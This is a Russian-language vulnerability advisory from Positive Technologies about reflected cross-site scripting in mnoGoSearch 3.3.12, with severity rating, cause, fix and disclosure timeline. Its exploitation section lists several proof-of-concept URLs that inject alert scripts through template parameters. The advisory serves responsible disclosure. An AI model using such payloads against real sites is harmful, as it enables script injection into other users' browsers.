PT-2013-18: Перезапись переменных в mnoGoSearch

Уязвимое ПО

mnoGoSearch
Версия: 3.3.12 и более ранняя

Ссылка: 
http://www.mnogosearch.org/

Рейтинг опасности

Уровень опасности: средний 
Воздействие: межсайтовое выполнение сценариев
Вектор атаки: удаленный

CVSS v2: 
Base Score: 4.3 
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) 

CVE: отсутствует

Описание программы

mnoGoSearch - универсальная поисковая система для локальных и глобальных серверов.

Описание уязвимости

Специалисты исследовательского центра компании Positive Technologies обнаружили уязвимость "Межсайтовое выполнение сценариев" в приложении mnoGoSearch.

Из-за некорректной архитектуры приложения все переменные шаблона и переменные, переданные клиентом, хранятся в одном списке. Это позволяет перезаписать любые неинициализированные параметры, используемые в шаблоне. Перезапись параметров, отображаемых на странице без предварительной обработки, приводит к множественным уязвимостям типа "Межсайтовое выполнение сценариев".

Пример эксплуатации

http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a

Решение

Установите последнюю версию приложения.

Статус уведомления

15.02.2013 - Производителю отправлены детали уязвимости
01.03.2013 - Производитель выпустил исправление
05.03.2013 - Публикация уязвимости

Благодарности

Уязвимость обнаружил Сергей Бобров (Исследовательcкий центр Positive Research компании Positive Technologies)

Ссылки

http://www.securitylab.ru/lab/PT-2013-18
http://www.mnogosearch.org/bugs/index.php?id=4819

Список отчетов о ранее обнаруженных уязвимостях Positive Research:

http://www.ptsecurity.ru/lab/advisory/
http://www.securitylab.ru/lab/

Уязвимости